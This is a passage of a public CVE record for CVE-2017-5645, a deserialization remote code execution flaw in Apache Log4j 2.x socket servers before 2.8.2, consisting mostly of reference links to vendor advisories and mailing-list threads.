"2018-01-18T02:00:00", dateReserved: "2017-06-21T00:00:00", dateUpdated: "2024-10-04T16:38:51.515Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2017-5645
Vulnerability from cvelistv5
Published
2017-04-17 21:00
Modified
2024-08-05 15:11
Severity ?
EPSS score ?
Summary
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Log4j |
Version: All versions between 2.0-alpha1 and 2.8.1 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T15:11:47.391Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "RHSA-2017:2888", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { name: "RHSA-2017:2809", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { name: "97702", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/97702", }, { name: "1041294", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1041294", }, { name: "RHSA-2017:2810", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { name: "RHSA-2017:1801", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { name: "RHSA-2017:2889", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { name: "RHSA-2017:2635", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { name: "RHSA-2017:2638", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { name: "RHSA-2017:1417", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { name: "RHSA-2017:2423", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { name: "RHSA-2017:2808", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2808", }, { name: "1040200", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1040200", }, { name: "RHSA-2017:2636", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { name: "RHSA-2017:3399", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { name: "RHSA-2017:2637", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2637", }, { name: "RHSA-2017:3244", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { name: "RHSA-2017:3400", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { name: "RHSA-2017:2633", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { name: "RHSA-2017:2811", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { name: "RHSA-2017:1802", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { name: "RHSA-2019:1545", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { name: "[logging-dev] 20191215 Re: Is there any chance that there will be a security fix for log4j-v1.2.17?", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3Cdev.logging.apache.org%3E", }, { name: "[logging-dev] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3Cdev.logging.apache.org%3E", }, { name: "[oss-security] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { name: "[announce] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3Cannounce.apache.org%3E", }, { name: "[logging-dev] 20191219 Re: [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3Cdev.logging.apache.org%3E", }, { name: "[activemq-issues] 20191226 [jira] [Created] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Created] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191230 [jira] [Created] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20191230 [jira] [Created] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20200106 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200107 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200108 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200110 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 Re: [jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Closed] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Resolved] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200114 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200115 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Resolved] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200127 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200208 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Resolved] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3Cissues.activemq.apache.org%3E", }, { name: "[logging-commits] 20200425 svn commit: r1059809 - /websites/production/logging/content/log4j/2.13.2/security.html", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3Ccommits.logging.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { name: "[bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E", }, { name: "[activemq-issues] 20200730 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3Cissues.activemq.apache.org%3E", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "[doris-commits] 20210402 [GitHub] [incubator-doris] zh0122 opened a new pull request #5594: [FE][Bug]Update log4j-web to fix a security issue", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3Ccommits.doris.apache.org%3E", }, { name: "[beam-issues] 20210528 [jira] [Created] (BEAM-12422) Vendored gRPC 1.36.0 is using a log4j version with security issues", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3Cissues.beam.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik opened a new pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] edited a comment on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] suztomo commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3Cgithub.beam.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j", vendor: "Apache Software Foundation", versions: [ { status: "affected", version: "All versions between 2.0-alpha1 and 2.8.1", }, ], }, ], datePublic: "2017-04-02T00:00:00", descriptions: [ { lang: "en", value: "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", }, ], problemTypes: [ { descriptions: [ { description: "Remote Code Execution.", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2022-02-07T14:40:00", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { name: "RHSA-2017:2888", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { name: "RHSA-2017:2809", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { name: "97702", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/97702", }, { name: "1041294", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1041294", }, { name: "RHSA-2017:2810", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { name: "RHSA-2017:1801", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { name: "RHSA-2017:2889", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { name: "RHSA-2017:2635", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { name: "RHSA-2017:2638", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { name: "RHSA-2017:1417", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { name: "RHSA-2017:2423", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { name: "RHSA-2017:2808", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2808", }, { name: "1040200", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1040200", }, { name: "RHSA-2017:2636", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { name: "RHSA-2017:3399", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { name: "RHSA-2017:2637", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2637", }, { name: "RHSA-2017:3244", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { name: "RHSA-2017:3400", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { name: "RHSA-2017:2633", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { name: "RHSA-2017:2811", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { name: "RHSA-2017:1802", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { name: "RHSA-2019:1545", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { name: "[logging-dev] 20191215 Re: Is there any chance that there will be a security fix for log4j-v1.2.17?", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3Cdev.logging.apache.org%3E", }, { name: "[logging-dev] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3Cdev.logging.apache.org%3E", }, { name: "[oss-security] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { name: "[announce] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3Cannounce.apache.org%3E", }, { name: "[logging-dev] 20191219 Re: [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3Cdev.logging.apache.org%3E", }, { name: "[activemq-issues] 20191226 [jira] [Created] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Created] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191230 [jira] [Created] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20191230 [jira] [Created] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20200106 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200107 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200108 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200110 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 Re: [jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 